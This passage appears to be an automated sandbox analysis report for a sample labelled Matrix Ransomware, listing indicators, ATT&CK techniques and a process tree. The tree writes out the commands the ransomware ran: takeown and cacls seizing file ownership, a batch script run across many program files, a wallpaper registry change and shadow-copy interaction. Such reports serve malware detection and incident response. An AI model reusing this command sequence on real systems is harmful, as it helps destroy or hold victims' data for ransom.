Set value (str)	\REGISTRY\USER\S-1-5-21-3470981204-343661084-3367201002-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\rqDVafGM.bmp"	Process not Found

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
2032	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
2508	takeown.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.fca	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\North_Dakota\Center	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened for modification	C:\Program Files\Windows Journal\Templates\blank.jtp	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\vlc-cache-gen.exe	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Spelling.api	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\AB89_INFO.rtf	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\eclipse.inf	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\locale\org-openide-filesystems_zh_CN.jar	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\AccessBridgePackages.h	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\amd64\jvm.cfg	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\leftnav.gif	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+2	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\epl-v10.html	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened for modification	C:\Program Files\Mozilla Firefox\plugin-container.exe	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Europe\Kaliningrad	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File created	C:\Program Files\Microsoft Games\Chess\ja-JP\AB89_INFO.rtf	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.controlpanel.ui_5.5.0.165303.jar	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\locale\updater_zh_CN.jar	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Brussels	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened for modification	C:\Program Files\MoveWrite.png	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\AB89_INFO.rtf	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\feedbck2.gif	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\META-INF\AB89_INFO.rtf	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\Guyana	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\106.0.5249.119\106.0.5249.119.manifest	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened for modification	C:\Program Files\Microsoft Games\FreeCell\en-US\FreeCell.exe.mui	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\106.0.5249.119\VisualElements\SmallLogoDev.png	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\GMT	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_zh_HK.properties	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Choibalsan	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened for modification	C:\Program Files\Java\jre7\lib\plugin.jar	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Africa\Ndjamena	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened for modification	C:\Program Files\CompressNew.ADTS	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt.theme_0.9.300.v20140424-2042.jar	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-spi-quicksearch_ja.jar	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\COPYING.txt	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Hebron	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.update.configurator.nl_zh_4.4.0.v20140623020002.jar	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.greychartplugin_5.5.0.165303.jar	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.databinding_1.6.200.v20140528-1422.jar	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened for modification	C:\Program Files\Java\jre7\lib\content-types.properties	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.model.workbench.nl_zh_4.4.0.v20140623020002.jar	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File created	C:\Program Files\Java\jre7\lib\ext\AB89_INFO.rtf	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Asia\Qyzylorda	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File created	C:\Program Files\Microsoft Games\Multiplayer\Spades\it-IT\AB89_INFO.rtf	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\eclipse.inf	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Asia\Urumqi	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened for modification	C:\Program Files\Mozilla Firefox\private_browsing.exe	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened for modification	C:\Program Files (x86)\MSBuild\Microsoft.Office.InfoPath.targets	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Asia\Almaty	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File created	C:\Program Files\Google\Chrome\Application\106.0.5249.119\VisualElements\AB89_INFO.rtf	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.ui_5.5.0.165303.jar	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened for modification	C:\Program Files\Microsoft Games\Minesweeper\en-US\Minesweeper.exe.mui	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File created	C:\Program Files\Microsoft Games\Hearts\it-IT\AB89_INFO.rtf	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File created	C:\Program Files\VideoLAN\VLC\locale\et\LC_MESSAGES\AB89_INFO.rtf	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales\ar.pak	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423861258748.profile.gz	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Guam	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_winxp_blu.css	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.sat4j.core_2.3.5.v201308161310.jar	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened for modification	C:\Program Files\Java\jre7\lib\ext\jaccess.jar	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk.scheduler.nl_ja_4.4.0.v20140623020002.jar	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-awt.jar	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
2652	schtasks.exe

Interacts with shadow copies 2 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

pid	Process
4516	vssadmin.exe

Suspicious behavior: EnumeratesProcesses 9 IoCs

pid	Process
2032	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
2032	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
2508	takeown.exe
2508	takeown.exe
1584	3KvhBUKy64.exe
1584	3KvhBUKy64.exe
1584	3KvhBUKy64.exe
1584	3KvhBUKy64.exe
1584	3KvhBUKy64.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
1584	3KvhBUKy64.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1584	3KvhBUKy64.exe
Token: SeLoadDriverPrivilege	1584	3KvhBUKy64.exe
Token: SeBackupPrivilege	1124	vssvc.exe
Token: SeRestorePrivilege	1124	vssvc.exe
Token: SeAuditPrivilege	1124	vssvc.exe
Token: SeIncreaseQuotaPrivilege	4616	cmd.exe
Token: SeSecurityPrivilege	4616	cmd.exe
Token: SeTakeOwnershipPrivilege	4616	cmd.exe
Token: SeLoadDriverPrivilege	4616	cmd.exe
Token: SeSystemProfilePrivilege	4616	cmd.exe
Token: SeSystemtimePrivilege	4616	cmd.exe
Token: SeProfSingleProcessPrivilege	4616	cmd.exe
Token: SeIncBasePriorityPrivilege	4616	cmd.exe
Token: SeCreatePagefilePrivilege	4616	cmd.exe
Token: SeBackupPrivilege	4616	cmd.exe
Token: SeRestorePrivilege	4616	cmd.exe
Token: SeShutdownPrivilege	4616	cmd.exe
Token: SeDebugPrivilege	4616	cmd.exe
Token: SeSystemEnvironmentPrivilege	4616	cmd.exe
Token: SeRemoteShutdownPrivilege	4616	cmd.exe
Token: SeUndockPrivilege	4616	cmd.exe
Token: SeManageVolumePrivilege	4616	cmd.exe
Token: 33	4616	cmd.exe
Token: 34	4616	cmd.exe
Token: 35	4616	cmd.exe
Token: SeIncreaseQuotaPrivilege	4616	cmd.exe
Token: SeSecurityPrivilege	4616	cmd.exe
Token: SeTakeOwnershipPrivilege	4616	cmd.exe
Token: SeLoadDriverPrivilege	4616	cmd.exe
Token: SeSystemProfilePrivilege	4616	cmd.exe
Token: SeSystemtimePrivilege	4616	cmd.exe
Token: SeProfSingleProcessPrivilege	4616	cmd.exe
Token: SeIncBasePriorityPrivilege	4616	cmd.exe
Token: SeCreatePagefilePrivilege	4616	cmd.exe
Token: SeBackupPrivilege	4616	cmd.exe
Token: SeRestorePrivilege	4616	cmd.exe
Token: SeShutdownPrivilege	4616	cmd.exe
Token: SeDebugPrivilege	4616	cmd.exe
Token: SeSystemEnvironmentPrivilege	4616	cmd.exe
Token: SeRemoteShutdownPrivilege	4616	cmd.exe
Token: SeUndockPrivilege	4616	cmd.exe
Token: SeManageVolumePrivilege	4616	cmd.exe
Token: 33	4616	cmd.exe
Token: 34	4616	cmd.exe
Token: 35	4616	cmd.exe
Token: SeTakeOwnershipPrivilege	4756	3KvhBUKy.exe
Token: SeTakeOwnershipPrivilege	4428	takeown.exe
Token: SeTakeOwnershipPrivilege	4804	Process not Found
Token: SeTakeOwnershipPrivilege	3540	Process not Found
Token: SeTakeOwnershipPrivilege	5036	Process not Found
Token: SeTakeOwnershipPrivilege	4856	Process not Found
Token: SeTakeOwnershipPrivilege	3896	Process not Found
Token: SeTakeOwnershipPrivilege	2828	Process not Found
Token: SeTakeOwnershipPrivilege	3900	Process not Found
Token: SeTakeOwnershipPrivilege	1088	Process not Found
Token: SeTakeOwnershipPrivilege	1128	Process not Found
Token: SeTakeOwnershipPrivilege	1720	Process not Found
Token: SeTakeOwnershipPrivilege	596	Process not Found
Token: SeTakeOwnershipPrivilege	3388	Process not Found
Token: SeTakeOwnershipPrivilege	2476	Process not Found
Token: SeTakeOwnershipPrivilege	3908	Process not Found
Token: SeTakeOwnershipPrivilege	3164	Process not Found
Token: SeTakeOwnershipPrivilege	1780	Process not Found
Token: SeTakeOwnershipPrivilege	1964	Process not Found

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2032 wrote to memory of 2604	2032	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe	1906
PID 2032 wrote to memory of 2604	2032	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe	1906
PID 2032 wrote to memory of 2604	2032	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe	1906
PID 2032 wrote to memory of 2604	2032	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe	1906
PID 2032 wrote to memory of 2508	2032	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe	1013
PID 2032 wrote to memory of 2508	2032	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe	1013
PID 2032 wrote to memory of 2508	2032	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe	1013
PID 2032 wrote to memory of 2508	2032	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe	1013
PID 2032 wrote to memory of 2004	2032	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe	48
PID 2032 wrote to memory of 2004	2032	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe	48
PID 2032 wrote to memory of 2004	2032	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe	48
PID 2032 wrote to memory of 2004	2032	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe	48
PID 2032 wrote to memory of 2856	2032	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe	1622
PID 2032 wrote to memory of 2856	2032	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe	1622
PID 2032 wrote to memory of 2856	2032	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe	1622
PID 2032 wrote to memory of 2856	2032	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe	1622
PID 2004 wrote to memory of 2020	2004	cmd.exe	1675
PID 2004 wrote to memory of 2020	2004	cmd.exe	1675
PID 2004 wrote to memory of 2020	2004	cmd.exe	1675
PID 2004 wrote to memory of 2020	2004	cmd.exe	1675
PID 2856 wrote to memory of 324	2856	Process not Found	1799
PID 2856 wrote to memory of 324	2856	Process not Found	1799
PID 2856 wrote to memory of 324	2856	Process not Found	1799
PID 2856 wrote to memory of 324	2856	Process not Found	1799
PID 2004 wrote to memory of 2116	2004	cmd.exe	37
PID 2004 wrote to memory of 2116	2004	cmd.exe	37
PID 2004 wrote to memory of 2116	2004	cmd.exe	37
PID 2004 wrote to memory of 2116	2004	cmd.exe	37
PID 2004 wrote to memory of 2500	2004	cmd.exe	1864
PID 2004 wrote to memory of 2500	2004	cmd.exe	1864
PID 2004 wrote to memory of 2500	2004	cmd.exe	1864
PID 2004 wrote to memory of 2500	2004	cmd.exe	1864
PID 2032 wrote to memory of 3868	2032	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe	39
PID 2032 wrote to memory of 3868	2032	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe	39
PID 2032 wrote to memory of 3868	2032	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe	39
PID 2032 wrote to memory of 3868	2032	095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe	39
PID 3868 wrote to memory of 3228	3868	cmd.exe	41
PID 3868 wrote to memory of 3228	3868	cmd.exe	41
PID 3868 wrote to memory of 3228	3868	cmd.exe	41
PID 3868 wrote to memory of 3228	3868	cmd.exe	41
PID 324 wrote to memory of 2268	324	Process not Found	949
PID 324 wrote to memory of 2268	324	Process not Found	949
PID 324 wrote to memory of 2268	324	Process not Found	949
PID 324 wrote to memory of 2268	324	Process not Found	949
PID 3868 wrote to memory of 2612	3868	cmd.exe	1639
PID 3868 wrote to memory of 2612	3868	cmd.exe	1639
PID 3868 wrote to memory of 2612	3868	cmd.exe	1639
PID 3868 wrote to memory of 2612	3868	cmd.exe	1639
PID 2268 wrote to memory of 2652	2268	cacls.exe	322
PID 2268 wrote to memory of 2652	2268	cacls.exe	322
PID 2268 wrote to memory of 2652	2268	cacls.exe	322
PID 2268 wrote to memory of 2652	2268	cacls.exe	322
PID 3868 wrote to memory of 2004	3868	cmd.exe	48
PID 3868 wrote to memory of 2004	3868	cmd.exe	48
PID 3868 wrote to memory of 2004	3868	cmd.exe	48
PID 3868 wrote to memory of 2004	3868	cmd.exe	48
PID 2004 wrote to memory of 3432	2004	cmd.exe	46
PID 2004 wrote to memory of 3432	2004	cmd.exe	46
PID 2004 wrote to memory of 3432	2004	cmd.exe	46
PID 2004 wrote to memory of 3432	2004	cmd.exe	46
PID 3432 wrote to memory of 1584	3432	3KvhBUKy.exe	45
PID 3432 wrote to memory of 1584	3432	3KvhBUKy.exe	45
PID 3432 wrote to memory of 1584	3432	3KvhBUKy.exe	45
PID 3432 wrote to memory of 1584	3432	3KvhBUKy.exe	45

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe
"C:\Users\Admin\AppData\Local\Temp\095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe"
1⤵
- Matrix Ransomware
- Loads dropped DLL
- Drops desktop.ini file(s)
- Enumerates connected drives
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2032
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.exe" "C:\Users\Admin\AppData\Local\Temp\NWgD7cfQ.exe"
  2⤵
  PID:2604
- C:\Users\Admin\AppData\Local\Temp\NWgD7cfQ.exe
  "C:\Users\Admin\AppData\Local\Temp\NWgD7cfQ.exe" -n
  2⤵
  PID:2508
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\rqDVafGM.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
  2⤵
  PID:2004
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\rqDVafGM.bmp" /f
    3⤵
    PID:2020
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      PID:1132
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f
    3⤵
    PID:2116
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
    3⤵
    PID:2500
- - C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
    3KvhBUKy.exe -accepteula "StandardBusiness.pdf" -nobanner
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:3432
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3868
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf" /E /G Admin:F /C
    3⤵
    PID:3228
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf"
    3⤵
    - Modifies file permissions
    PID:2612
  - - C:\Windows\SysWOW64\cacls.exe
      cacls "C:\Program Files\Windows Journal\it-IT\PDIALOG.exe.mui" /E /G Admin:F /C
      4⤵
      PID:4660
  - - C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
      3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
      4⤵
      PID:2580
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "StandardBusiness.pdf" -nobanner
    3⤵
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:2004
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\uxBbuLmF.vbs"
  2⤵
  PID:2856
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\PDFSigQFormalRep.pdf""
  2⤵
  PID:3332
- - C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
    3KvhBUKy.exe -accepteula "ended_review_or_form.gif" -nobanner
    3⤵
    PID:220
- - C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
    3KvhBUKy.exe -accepteula "NBMapTIP.dll.mui" -nobanner
    3⤵
    PID:3356
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files\Windows Journal\fr-FR\Journal.exe.mui""
  2⤵
  PID:4024
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf""
  2⤵
  PID:4328
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Windows Mail\fr-FR\WinMail.exe.mui""
  2⤵
  PID:5052
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "WinMail.exe.mui" -nobanner
    3⤵
    PID:3060
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files\Microsoft Games\SpiderSolitaire\SpiderSolitaireMCE.png""
  2⤵
  PID:1580
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif""
  2⤵
  PID:4880
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Windows Photo Viewer\de-DE\PhotoViewer.dll.mui""
  2⤵
  PID:1284
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zy______.pfm""
  2⤵
  PID:3960
- - C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
    3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1184
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "add_reviewer.gif" -nobanner
      4⤵
      PID:2996
    - - C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
        
        3KvhBUKy.exe -accepteula "add_reviewer.gif" -nobanner
        5⤵
        
        PID:2540
  - - C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
      3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
      4⤵
      PID:2192
  - - C:\Windows\SysWOW64\takeown.exe
      takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif"
      4⤵
      PID:2156
  - - C:\Windows\SysWOW64\cacls.exe
      cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif" /E /G Admin:F /C
      4⤵
      PID:1828
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT""
  2⤵
  PID:1480
- - C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe
    3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3576
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "CP1258.TXT" -nobanner
    3⤵
    PID:1044
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT"
    3⤵
    PID:1572
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT" /E /G Admin:F /C
    3⤵
    PID:1884
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Windows Mail\en-US\WinMail.exe.mui""
